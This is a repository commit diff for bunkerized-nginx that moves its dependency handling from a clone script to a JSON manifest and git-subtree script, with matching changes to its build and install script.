librewolf
/
bunkerized-nginx
mirror of https://github.com/bunkerity/bunkerized-nginx
4
0
Fork 1
Code Issues Projects Releases Wiki Activity

Merge pull request #547 from bunkerity/subtrees 

Migrate regular cloned deps into subtrees
This commit is contained in:
Théophile Diot 2023-06-30 15:45:35 -04:00 committed by GitHub
parent 265123835f 3505c0d18f
commit 5631e27378
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2772 changed files with 44023 additions and 402716 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

342
src/deps/clone.sh
View File

@ -1,342 +0,0 @@
#!/bin/bash
function git_update_checker() {
repo="$1"
commit="$2"
main_tmp_folder="/tmp/bunkerweb"
mkdir -p "${main_tmp_folder}"
echo " Check updates for ${repo}"
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
output="$(git clone --recursive "$repo" "${main_tmp_folder}/${folder}")"
if [ $? -ne 0 ] ; then
echo "❌ Error cloning $1"
echo "$output"
rm -rf "${main_tmp_folder}/${folder}" || true
return
fi
old_dir="$(pwd)"
cd "${main_tmp_folder}/${folder}"
output="$(git checkout "${commit}^{commit}" 2>&1)"
if [ $? -ne 0 ] ; then
echo "❌ Commit hash $commit is absent from repository $repo"
echo "$output"
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
output="$(git fetch 2>&1)"
if [ $? -ne 0 ] ; then
echo "⚠️ Upgrade version checker error on $repo"
echo "$output"
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
latest_tag=$(git describe --tags `git rev-list --tags --max-count=1`)
if [ $? -ne 0 ] ; then
echo "⚠️ Upgrade version checker error on getting latest tag $repo"
echo "$latest_tag"
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
latest_release=$(curl --silent "https://api.github.com/repos/$full_name_repo/releases/latest" | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
if [ $? -ne 0 ] ; then
echo "⚠️ Upgrade version checker error on getting latest release $repo"
echo "$latest_release"
rm -fr "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
return
fi
current_tag=$(git describe --tags)
if [[ ! -z "$latest_tag" ]] && [[ "$current_tag" != *"$latest_tag"* ]]; then
echo "⚠️ Update checker: new tag found: $latest_tag, current tag/release: $current_tag, please update"
fi
if [[ ! -z "$latest_release" ]] && [[ "$current_tag" != *"$latest_release"* ]]; then
echo "⚠️ Update checker: new tag found: $latest_release, current tag/release: $current_tag, please update"
fi
rm -rf "${main_tmp_folder}/${folder}" || true
cd "$old_dir"
}
function git_secure_clone() {
repo="$1"
commit="$2"
folder="$(echo "$repo" | sed -E "s@https://github.com/.*/(.*)\.git@\1@")"
if [ ! -d "deps/src/${folder}" ] ; then
output="$(git clone --recursive "$repo" "deps/src/${folder}")"
if [ $? -ne 0 ] ; then
echo "❌ Error cloning $1"
echo "$output"
exit 1
fi
old_dir="$(pwd)"
cd "deps/src/${folder}"
output="$(git checkout "${commit}^{commit}" 2>&1)"
if [ $? -ne 0 ] ; then
echo "❌ Commit hash $commit is absent from repository $repo"
echo "$output"
exit 1
fi
cd "$old_dir"
output="$(rm -rf "deps/src/${folder}/.git")"
if [ $? -ne 0 ] ; then
echo "❌ Can't delete .git from repository $repo"
echo "$output"
exit 1
fi
else
echo "⚠️ Skipping clone of $repo because target directory is already present"
git_update_checker $repo $commit
fi
}
function secure_download() {
link="$1"
file="$2"
hash="$3"
dir="$(echo $file | sed 's/.tar.gz//g')"
if [ ! -d "deps/src/${dir}" ] ; then
output="$(wget -q -O "deps/src/${file}" "$link" 2>&1)"
if [ $? -ne 0 ] ; then
echo "❌ Error downloading $link"
echo "$output"
exit 1
fi
check="$(sha512sum "deps/src/${file}" | cut -d ' ' -f 1)"
if [ "$check" != "$hash" ] ; then
echo "❌️ Wrong hash from file $link (expected $hash got $check)"
exit 1
fi
else
echo "⚠️ Skipping download of $link because target directory is already present"
fi
}
function do_and_check_cmd() {
if [ "$CHANGE_DIR" != "" ] ; then
cd "$CHANGE_DIR"
fi
output=$("$@" 2>&1)
ret="$?"
if [ $ret -ne 0 ] ; then
echo "❌ Error from command : $*"
echo "$output"
exit $ret
fi
#echo $output
return 0
}
# nginx 1.24.0
echo " Downloading nginx"
NGINX_VERSION="1.24.0"
secure_download "https://nginx.org/download/nginx-${NGINX_VERSION}.tar.gz" "nginx-${NGINX_VERSION}.tar.gz" "1114e37de5664a8109c99cfb2faa1f42ff8ac63c932bcf3780d645e5ed32c0b2ac446f80305b4465994c8f9430604968e176ae464fd80f632d1cb2c8f6007ff3"
if [ -f "deps/src/nginx-${NGINX_VERSION}.tar.gz" ] ; then
do_and_check_cmd tar -xvzf deps/src/nginx-${NGINX_VERSION}.tar.gz -C deps/src
do_and_check_cmd rm -f deps/src/nginx-${NGINX_VERSION}.tar.gz
fi
# Lua 5.1.5
echo " Downloading Lua"
LUA_VERSION="5.1.5"
secure_download "https://www.lua.org/ftp/lua-${LUA_VERSION}.tar.gz" "lua-${LUA_VERSION}.tar.gz" "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
if [ -f "deps/src/lua-${LUA_VERSION}.tar.gz" ] ; then
do_and_check_cmd tar -xvzf deps/src/lua-${LUA_VERSION}.tar.gz -C deps/src
do_and_check_cmd rm -f deps/src/lua-${LUA_VERSION}.tar.gz
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/Makefile deps/misc/lua.patch1
do_and_check_cmd patch deps/src/lua-${LUA_VERSION}/src/Makefile deps/misc/lua.patch2
fi
# LuaJIT v2.1-20230410
echo " Downloading LuaJIT"
git_secure_clone "https://github.com/openresty/luajit2.git" "04f33ff01da97905a1641985fb5c840d234f97f1"
# lua-nginx-module v0.10.25
echo " Downloading lua-nginx-module"
git_secure_clone "https://github.com/openresty/lua-nginx-module.git" "c47084b5d719ce507d2419d8660f39544a9d1fea"
# lua-resty-core v0.1.27
echo " Downloading lua-resty-core"
git_secure_clone "https://github.com/openresty/lua-resty-core.git" "31fae862a1ed64033591f991fadb0dd80358ba0b"
# lua-resty-lrucache v0.13
echo " Downloading lua-resty-lrucache"
git_secure_clone "https://github.com/openresty/lua-resty-lrucache.git" "a79615ec9dc547fdb4aaee59ef8f5a50648ce9fd"
# lua-resty-dns v0.22
echo " Downloading lua-resty-dns"
git_secure_clone "https://github.com/openresty/lua-resty-dns.git" "869d2fbb009b6ada93a5a10cb93acd1cc12bd53f"
# lua-resty-session v4.0.4
echo " Downloading lua-resty-session"
git_secure_clone "https://github.com/bungle/lua-resty-session.git" "8b5f8752f3046396c414c5b97850e784c07e1641"
# lua-resty-random v?
echo " Downloading lua-resty-random"
git_secure_clone "https://github.com/bungle/lua-resty-random.git" "17b604f7f7dd217557ca548fc1a9a0d373386480"
# lua-resty-string v0.15
echo " Downloading lua-resty-string"
git_secure_clone "https://github.com/openresty/lua-resty-string.git" "b192878f6ed31b0af237935bbc5a8110a3c2256c"
# lua-cjson v2.1.0.12
echo " Downloading lua-cjson"
git_secure_clone "https://github.com/openresty/lua-cjson.git" "881accc8fadca5ec02aa34d364df2a1aa25cd2f9"
# lua-gd v2.0.33r3+
echo " Downloading lua-gd"
git_secure_clone "https://github.com/ittner/lua-gd.git" "2ce8e478a8591afd71e607506bc8c64b161bbd30"
# lua-resty-http v0.17.1
echo " Downloading lua-resty-http"
git_secure_clone "https://github.com/ledgetech/lua-resty-http.git" "4ab4269cf442ba52507aa2c718f606054452fcad"
# lualogging v1.8.2
echo " Downloading lualogging"
git_secure_clone "https://github.com/lunarmodules/lualogging.git" "465c994788f1bc18fca950934fa5ec9a909f496c"
# luasocket v3.1.0
echo " Downloading luasocket"
git_secure_clone "https://github.com/diegonehab/luasocket.git" "95b7efa9da506ef968c1347edf3fc56370f0deed"
# luasec v1.3.1
echo " Downloading luasec"
git_secure_clone "https://github.com/brunoos/luasec.git" "fddde111f7fe9ad5417d75ebbd70429d13eaad97"
# lua-resty-ipmatcher v0.6.1 (3 commits after just in case)
echo " Downloading lua-resty-ipmatcher"
dopatch="no"
if [ ! -d "deps/src/lua-resty-ipmatcher" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/api7/lua-resty-ipmatcher.git" "7fbb618f7221b1af1451027d3c64e51f3182761c"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua deps/misc/ipmatcher.patch
fi
# lua-resty-redis v0.30
echo " Downloading lua-resty-redis"
git_secure_clone "https://github.com/openresty/lua-resty-redis.git" "d7c25f1b339d79196ff67f061c547a73a920b580"
# lua-resty-upload v0.11
echo " Downloading lua-resty-upload"
git_secure_clone "https://github.com/openresty/lua-resty-upload.git" "03704aee42f7135e7782688d8a9af63a16015edc"
# luajit-geoip v2.1.0
echo " Downloading luajit-geoip"
dopatch="no"
if [ ! -d "deps/src/luajit-geoip" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/leafo/luajit-geoip.git" "12a9388207f40c37ad5cf6de2f8e0cc72bf13477"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/luajit-geoip/geoip/mmdb.lua deps/misc/mmdb.patch
fi
# lbase64 v1.5.3
echo " Downloading lbase64"
git_secure_clone "https://github.com/iskolbin/lbase64.git" "c261320edbdf82c16409d893a96c28c704aa0ab8"
# lua-resty-env v0.4.0
echo " Downloading lua-resty-env"
git_secure_clone "https://github.com/3scale/lua-resty-env.git" "adb294def823dd910ffa11972d2c61eab7cfce3e"
# lua-resty-mlcache v2.6.0
echo " Downloading lua-resty-mlcache"
git_secure_clone "https://github.com/thibaultcha/lua-resty-mlcache.git" "f140f56663cbdb9cdd247d29f75c299c702ff6b4"
# lua-resty-template v2.0
echo " Downloading lua-resty-template"
git_secure_clone "https://github.com/bungle/lua-resty-template.git" "c08c6bc9e27710806990f2dec0f03b19406976ac"
# lua-resty-lock v0.09
echo " Downloading lua-resty-lock"
git_secure_clone "https://github.com/openresty/lua-resty-lock.git" "9dc550e56b6f3b1a2f1a31bb270a91813b5b6861"
# lua-resty-openssl v0.8.23
echo " Downloading lua-resty-openssl"
dopatch="no"
if [ ! -d "deps/src/lua-resty-openssl" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/fffonion/lua-resty-openssl.git" "b23c072a405b749ac60d21e3946cbf57a959b780"
if [ "$dopatch" == "yes" ] ; then
do_and_check_cmd rm -r deps/src/lua-resty-openssl/t
fi
# lua-ffi-zlib v0.5.0
echo " Downloading lua-ffi-zlib"
dopatch="no"
if [ ! -d "deps/src/lua-ffi-zlib" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/hamishforbes/lua-ffi-zlib.git" "1fb69ca505444097c82d2b72e87904f3ed923ae9"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/lua-ffi-zlib/lib/ffi-zlib.lua deps/misc/lua-ffi-zlib.patch
fi
# lua-resty-signal v0.03
echo " Downloading lua-resty-signal"
git_secure_clone "https://github.com/openresty/lua-resty-signal.git" "d07163e8cfa673900e66048cd2a1f18523aecf16"
# ModSecurity v3.0.9
echo " Downloading ModSecurity"
dopatch="no"
if [ ! -d "deps/src/ModSecurity" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/SpiderLabs/ModSecurity.git" "205dac0e8c675182f96b5c2fb06be7d1cf7af2b2"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/ModSecurity/configure.ac deps/misc/modsecurity.patch
do_and_check_cmd rm -rf deps/src/ModSecurity/others/libinjection
fi
# libinjection v3.10.0+
# TODO: check if the latest commit is fine
echo " Downloading libinjection"
git_secure_clone "https://github.com/libinjection/libinjection.git" "49904c42a6e68dc8f16c022c693e897e4010a06c"
do_and_check_cmd cp -r deps/src/libinjection deps/src/ModSecurity/others
# ModSecurity-nginx v1.0.3
echo " Downloading ModSecurity-nginx"
dopatch="no"
if [ ! -d "deps/src/ModSecurity-nginx" ] ; then
dopatch="yes"
fi
git_secure_clone "https://github.com/SpiderLabs/ModSecurity-nginx.git" "d59e4ad121df702751940fd66bcc0b3ecb51a079"
if [ "$dopatch" = "yes" ] ; then
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_log.c deps/misc/modsecurity-nginx.patch
do_and_check_cmd patch deps/src/ModSecurity-nginx/config deps/misc/config.patch
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_common.h deps/misc/ngx_http_modsecurity_common.h.patch
do_and_check_cmd patch deps/src/ModSecurity-nginx/src/ngx_http_modsecurity_module.c deps/misc/ngx_http_modsecurity_module.c.patch
do_and_check_cmd cp deps/misc/ngx_http_modsecurity_access.c deps/src/ModSecurity-nginx/src
fi
# libmaxminddb v1.7.1
echo " Downloading libmaxminddb"
git_secure_clone "https://github.com/maxmind/libmaxminddb.git" "ac4d0d2480032a8664e251588e57d7b306ca630c"
# zlib v1.2.13
echo " Downloading zlib"
git_secure_clone "https://github.com/madler/zlib.git" "04f42ceca40f73e2978b50e93806c2a18c1281fc"
# headers-more-nginx-module v0.34
echo " Downloading headers-more-nginx-module"
git_secure_clone "https://github.com/openresty/headers-more-nginx-module.git" "bea1be3bbf6af28f6aa8cf0c01c07ee1637e2bd0"
# nginx_cookie_flag_module v1.1.0
echo " Downloading nginx_cookie_flag_module"
git_secure_clone "https://github.com/AirisX/nginx_cookie_flag_module.git" "4e48acf132952bbed43b28a8e6af0584dacb7b4c"
# ngx_brotli v1.0.0
echo " Downloading ngx_brotli"
git_secure_clone "https://github.com/google/ngx_brotli.git" "6e975bcb015f62e1f303054897783355e2a877dc"
# ngx_devel_kit v0.3.2
echo " Downloading ngx_devel_kit"
git_secure_clone "https://github.com/vision5/ngx_devel_kit.git" "b4642d6ca01011bd8cd30b253f5c3872b384fd21"
# stream-lua-nginx-module v0.0.13
echo " Downloading stream-lua-nginx-module"
git_secure_clone "https://github.com/openresty/stream-lua-nginx-module.git" "309198abf26266f1a3e53c71388ed7bb9d1e5ea2"

233
src/deps/deps.json Normal file
View File

@ -0,0 +1,233 @@
{
"download": [
{
"name": "Lua",
"url": "https://www.lua.org/ftp/lua-5.1.5.tar.gz",
"sha512": "0142fefcbd13afcd9b201403592aa60620011cc8e8559d4d2db2f92739d18186860989f48caa45830ff4f99bfc7483287fd3ff3a16d4dec928e2767ce4d542a9"
}
],
"git_repository": [
{
"id": "luajit",
"name": "LuaJIT",
"url": "https://github.com/openresty/luajit2.git",
"commit": "v2.1-20230410"
},
{
"id": "modsecurity",
"name": "ModSecurity",
"url": "https://github.com/SpiderLabs/ModSecurity.git",
"commit": "v3.0.9"
},
{
"id": "modsecurity-nginx",
"name": "ModSecurity-nginx",
"url": "https://github.com/SpiderLabs/ModSecurity-nginx.git",
"commit": "v1.0.3"
},
{
"id": "nginx",
"name": "Nginx",
"url": "https://github.com/nginx/nginx.git",
"commit": "release-1.24.0"
},
{
"id": "ngx_brotli",
"name": "Nginx Brotli v1.0.9",
"url": "https://github.com/google/ngx_brotli.git",
"commit": "6e975bcb015f62e1f303054897783355e2a877dc"
},
{
"id": "nginx_cookie_flag_module",
"name": "Nginx cookie flag module",
"url": "https://github.com/AirisX/nginx_cookie_flag_module.git",
"commit": "v1.1.0"
},
{
"id": "ngx_devel_kit",
"name": "Nginx devel kit",
"url": "https://github.com/vision5/ngx_devel_kit.git",
"commit": "v0.3.2"
},
{
"id": "headers-more-nginx-module",
"name": "headers-more-nginx-module",
"url": "https://github.com/openresty/headers-more-nginx-module.git",
"commit": "v0.34"
},
{
"id": "lbase64",
"name": "lbase64",
"url": "https://github.com/iskolbin/lbase64.git",
"commit": "v1.5.3"
},
{
"id": "libinjection",
"name": "libinjection v3.10.0+",
"url": "https://github.com/libinjection/libinjection.git",
"commit": "49904c42a6e68dc8f16c022c693e897e4010a06c"
},
{
"id": "libmaxminddb",
"name": "libmaxminddb",
"url": "https://github.com/maxmind/libmaxminddb.git",
"commit": "1.7.1"
},
{
"id": "lua-cjson",
"name": "lua-cjson",
"url": "https://github.com/openresty/lua-cjson.git",
"commit": "2.1.0.12"
},
{
"id": "lua-ffi-zlib",
"name": "lua-ffi-zlib",
"url": "https://github.com/hamishforbes/lua-ffi-zlib.git",
"commit": "v0.5"
},
{
"id": "lua-gd",
"name": "lua-gd v2.0.33r3+",
"url": "https://github.com/ittner/lua-gd.git",
"commit": "2ce8e478a8591afd71e607506bc8c64b161bbd30"
},
{
"id": "lua-nginx-module",
"name": "lua-nginx-module",
"url": "https://github.com/openresty/lua-nginx-module.git",
"commit": "v0.10.25"
},
{
"id": "lua-resty-core",
"name": "lua-resty-core",
"url": "https://github.com/openresty/lua-resty-core.git",
"commit": "v0.1.27"
},
{
"id": "lua-resty-dns",
"name": "lua-resty-dns",
"url": "https://github.com/openresty/lua-resty-dns.git",
"commit": "v0.22"
},
{
"id": "lua-resty-env",
"name": "lua-resty-env",
"url": "https://github.com/3scale/lua-resty-env.git",
"commit": "v0.4.0"
},
{
"id": "lua-resty-http",
"name": "lua-resty-http",
"url": "https://github.com/ledgetech/lua-resty-http.git",
"commit": "v0.17.1"
},
{
"id": "lua-resty-ipmatcher",
"name": "lua-resty-ipmatcher v0.6.1 (3 commits after just in case)",
"url": "https://github.com/api7/lua-resty-ipmatcher.git",
"commit": "7fbb618f7221b1af1451027d3c64e51f3182761c"
},
{
"id": "lua-resty-lock",
"name": "lua-resty-lock",
"url": "https://github.com/openresty/lua-resty-lock.git",
"commit": "v0.09"
},
{
"id": "lua-resty-lrucache",
"name": "lua-resty-lrucache",
"url": "https://github.com/openresty/lua-resty-lrucache.git",
"commit": "v0.13"
},
{
"id": "lua-resty-mlcache",
"name": "lua-resty-mlcache",
"url": "https://github.com/thibaultcha/lua-resty-mlcache.git",
"commit": "2.6.0"
},
{
"id": "lua-resty-openssl",
"name": "lua-resty-openssl",
"url": "https://github.com/fffonion/lua-resty-openssl.git",
"commit": "0.8.23"
},
{
"id": "lua-resty-random",
"name": "lua-resty-random (latest commit)",
"url": "https://github.com/bungle/lua-resty-random.git",
"commit": "17b604f7f7dd217557ca548fc1a9a0d373386480"
},
{
"id": "lua-resty-redis",
"name": "lua-resty-redis",
"url": "https://github.com/openresty/lua-resty-redis.git",
"commit": "v0.30"
},
{
"id": "lua-resty-session",
"name": "lua-resty-session",
"url": "https://github.com/bungle/lua-resty-session.git",
"commit": "v4.0.4"
},
{
"id": "lua-resty-signal",
"name": "lua-resty-signal",
"url": "https://github.com/openresty/lua-resty-signal.git",
"commit": "v0.03"
},
{
"id": "lua-resty-string",
"name": "lua-resty-string",
"url": "https://github.com/openresty/lua-resty-string.git",
"commit": "v0.15"
},
{
"id": "lua-resty-template",
"name": "lua-resty-template",
"url": "https://github.com/bungle/lua-resty-template.git",
"commit": "v2.0"
},
{
"id": "lua-resty-upload",
"name": "lua-resty-upload",
"url": "https://github.com/openresty/lua-resty-upload.git",
"commit": "v0.11"
},
{
"id": "luajit-geoip",
"name": "luajit-geoip",
"url": "https://github.com/leafo/luajit-geoip.git",
"commit": "v2.1.0"
},
{
"id": "lualogging",
"name": "lualogging",
"url": "https://github.com/lunarmodules/lualogging.git",
"commit": "v1.8.2"
},
{
"id": "luasec",
"name": "luasec",
"url": "https://github.com/brunoos/luasec.git",
"commit": "v1.3.1"
},
{
"id": "luasocket",
"name": "luasocket",
"url": "https://github.com/diegonehab/luasocket.git",
"commit": "v3.1.0"
},
{
"id": "stream-lua-nginx-module",
"name": "stream-lua-nginx-module",
"url": "https://github.com/openresty/stream-lua-nginx-module.git",
"commit": "v0.0.13"
},
{
"id": "zlib",
"name": "zlib",
"url": "https://github.com/madler/zlib.git",
"commit": "v1.2.13"
}
]
}

59
src/deps/init_deps.sh Executable file
View File

@ -0,0 +1,59 @@
#!/bin/bash
function do_and_check_cmd() {
output=$("$@" 2>&1)
ret="$?"
if [ $ret -ne 0 ] ; then
echo "❌ Error from command : $*"
echo "$output"
exit $ret
fi
return 0
}
jq -c .download[] src/deps/deps.json | while read download
do
url="$(echo $download | jq -r .url)"
id="$(echo $url | sed 's/.*\/\([^\/]*\)\.tar\.gz/\1/')"
name="$(echo $download | jq -r .name)"
sha512="$(echo $download | jq -r .sha512)"
echo " Downloading ${name} from ${url}"
if [ ! -d "src/deps/src/${id}" ] ; then
do_and_check_cmd wget -q -O "src/deps/src/${id}.tar.gz" "$url"
check="$(sha512sum "src/deps/src/${id}.tar.gz" | cut -d ' ' -f 1)"
if [ "$check" != "$sha512" ] ; then
echo "❌️ Wrong hash from file $url (expected $sha512 got $check)"
exit 1
fi
if [ -f "src/deps/src/${id}.tar.gz" ] ; then
do_and_check_cmd tar -xvzf src/deps/src/${id}.tar.gz -C src/deps/src
do_and_check_cmd rm -f src/deps/src/${id}.tar.gz
fi
else
echo "⚠️ Skipping download of $url because target directory is already present"
fi
done
jq -c .git_repository[] src/deps/deps.json | while read repo
do
id="$(echo $repo | jq -r .id)"
name="$(echo $repo | jq -r .name)"
url="$(echo $repo | jq -r .url)"
commit="$(echo $repo | jq -r .commit)"
echo " Clone ${name} from ${url} at commit/version ${commit}"
if [ ! -d "src/deps/src/${id}" ] ; then
do_and_check_cmd git subtree add --prefix src/deps/src/${id} ${url} ${commit} --squash
else
echo "⚠️ Skipping clone of $url because target directory is already present"
echo " Updating ${name} from ${url} at commit/version ${commit}"
do_and_check_cmd git subtree pull --prefix src/deps/src/${id} ${url} ${commit} --squash
fi
if [ -d "src/deps/src/${id}/.git" ] ; then
do_and_check_cmd rm -rf "src/deps/src/${id}/.git"
fi
done

45
src/deps/install.sh
View File

@ -41,16 +41,19 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/zlib" do_and_check_cmd make install
echo " Compiling and installing ModSecurity"
# temp fix : Debian run it twice
# TODO : patch it in clone.sh
cd /tmp/bunkerweb/deps/src/ModSecurity && ./build.sh > /dev/null 2>&1
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd sh build.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/ModSecurity" do_and_check_cmd make install-strip
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity/configure.ac /tmp/bunkerweb/deps/misc/modsecurity.patch
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd rm -rf others/libinjection
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/libinjection /tmp/bunkerweb/deps/src/modsecurity/others/libinjection
cd /tmp/bunkerweb/deps/src/modsecurity && ./build.sh > /dev/null 2>&1
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd sh build.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd ./configure --disable-dependency-tracking --disable-static --disable-examples --disable-doxygen-doc --disable-doxygen-html --disable-valgrind-memcheck --disable-valgrind-helgrind --prefix=/usr/share/bunkerweb/deps --with-maxmind=/usr/share/bunkerweb/deps
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/modsecurity" do_and_check_cmd make install-strip
# Compiling and installing luajit2
echo " Compiling and installing luajit2"
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit2" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
# Compiling and installing luajit
echo " Compiling and installing luajit"
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/luajit" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps install
# Installing lua-resty-core
echo " Installing openresty/lua-resty-core"
@ -107,6 +110,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/luasec" do_and_check_cmd make LUACPATH=/usr/
# Installing lua-resty-ipmatcher
echo " Installing lua-resty-ipmatcher"
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-resty-ipmatcher/resty/ipmatcher.lua /tmp/bunkerweb/deps/misc/ipmatcher.patch
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-ipmatcher" do_and_check_cmd make INST_PREFIX=/usr/share/bunkerweb/deps INST_LIBDIR=/usr/share/bunkerweb/deps/lib/lua INST_LUADIR=/usr/share/bunkerweb/deps/lib/lua install
# Installing lua-resty-redis
@ -119,6 +123,7 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-upload" do_and_check_cmd make PREF
# Installing lujit-geoip
echo " Installing luajit-geoip"
do_and_check_cmd patch /tmp/bunkerweb/deps/src/luajit-geoip/geoip/mmdb.lua /tmp/bunkerweb/deps/misc/mmdb.patch
do_and_check_cmd cp -r /tmp/bunkerweb/deps/src/luajit-geoip/geoip /usr/share/bunkerweb/deps/lib/lua
# Installing lbase64
@ -143,11 +148,13 @@ CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-lock" do_and_check_cmd make PREFIX
# Installing lua-resty-openssl
echo " Installing lua-resty-openssl"
do_and_check_cmd rm -r /tmp/bunkerweb/deps/src/lua-resty-openssl/t
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-openssl" do_and_check_cmd make LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-resty-openssl/lib/resty/openssl.lua /usr/share/bunkerweb/deps/lib/lua/resty
# Installing lua-ffi-zlib
echo " Installing lua-ffi-zlib"
do_and_check_cmd patch /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /tmp/bunkerweb/deps/misc/lua-ffi-zlib.patch
do_and_check_cmd cp /tmp/bunkerweb/deps/src/lua-ffi-zlib/lib/ffi-zlib.lua /usr/share/bunkerweb/deps/lib/lua
# Installing lua-resty-signal
@ -155,6 +162,12 @@ echo " Installing lua-resty-signal"
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps -j $NTASK
CHANGE_DIR="/tmp/bunkerweb/deps/src/lua-resty-signal" do_and_check_cmd make PREFIX=/usr/share/bunkerweb/deps LUA_LIB_DIR=/usr/share/bunkerweb/deps/lib/lua install
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_log.c /tmp/bunkerweb/deps/misc/modsecurity-nginx.patch
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/config /tmp/bunkerweb/deps/misc/config.patch
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_common.h /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_common.h.patch
do_and_check_cmd patch /tmp/bunkerweb/deps/src/modsecurity-nginx/src/ngx_http_modsecurity_module.c /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_module.c.patch
do_and_check_cmd cp /tmp/bunkerweb/deps/misc/ngx_http_modsecurity_access.c /tmp/bunkerweb/deps/src/modsecurity-nginx/src
# Compile dynamic modules
echo " Compiling and installing dynamic modules"
CONFARGS="$(nginx -V 2>&1 | sed -n -e 's/^.*arguments: //p')"
@ -164,13 +177,15 @@ CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='-Wl/--with-ld-opt='-lpcr
if [ "$OS" = "fedora" ] ; then
CONFARGS="$(echo -n "$CONFARGS" | sed "s/--with-ld-opt='.*'/--with-ld-opt=-lpcre/" | sed "s/--with-cc-opt='.*'//")"
fi
echo '#!/bin/bash' > "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
echo "./configure $CONFARGS --add-dynamic-module=/tmp/bunkerweb/deps/src/headers-more-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/nginx_cookie_flag_module --add-dynamic-module=/tmp/bunkerweb/deps/src/lua-nginx-module --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_brotli --add-dynamic-module=/tmp/bunkerweb/deps/src/ngx_devel_kit --add-dynamic-module=/tmp/bunkerweb/deps/src/stream-lua-nginx-module" --add-dynamic-module=/tmp/bunkerweb/deps/src/ModSecurity-nginx >> "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
do_and_check_cmd chmod +x "/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}/configure-fix.sh"
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" LUAJIT_LIB="/usr/share/bunkerweb/deps/lib -Wl,-rpath,/usr/share/bunkerweb/deps/lib" LUAJIT_INC="/usr/share/bunkerweb/deps/include/luajit-2.1" MODSECURITY_LIB="/usr/share/bunkerweb/deps/lib" MODSECURITY_INC="/usr/share/bunkerweb/deps/include" do_and_check_cmd ./configure-fix.sh
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx-${NGINX_VERSION}" do_and_check_cmd make -j $NTASK modules
CHANGE_DIR="/tmp/bunkerweb/deps/src/nginx" do_and_check_cmd mv auto/configure ./
